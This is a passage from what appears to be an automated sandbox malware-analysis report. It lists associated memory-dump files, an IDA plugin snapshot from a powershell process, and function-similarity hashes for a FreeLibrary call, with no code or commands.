                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID: *!_$q
                                                                                        • API String ID: 3664257935-1837099632
                                                                                        • Opcode ID: f7365490623a465f137212d1d7d14d48feeed5697eeb6cd357218daf6d44b14a
                                                                                        • Instruction ID: 4eaca48a77391e586a255488f1ab6a2de075439de86115c767ca98e4eb529368
                                                                                        • Opcode Fuzzy Hash: f7365490623a465f137212d1d7d14d48feeed5697eeb6cd357218daf6d44b14a
                                                                                        • Instruction Fuzzy Hash: FA41677050C381ABE3158B25985477BBFE1EFE2700F14491CF4C69B3D2DB7A88068B96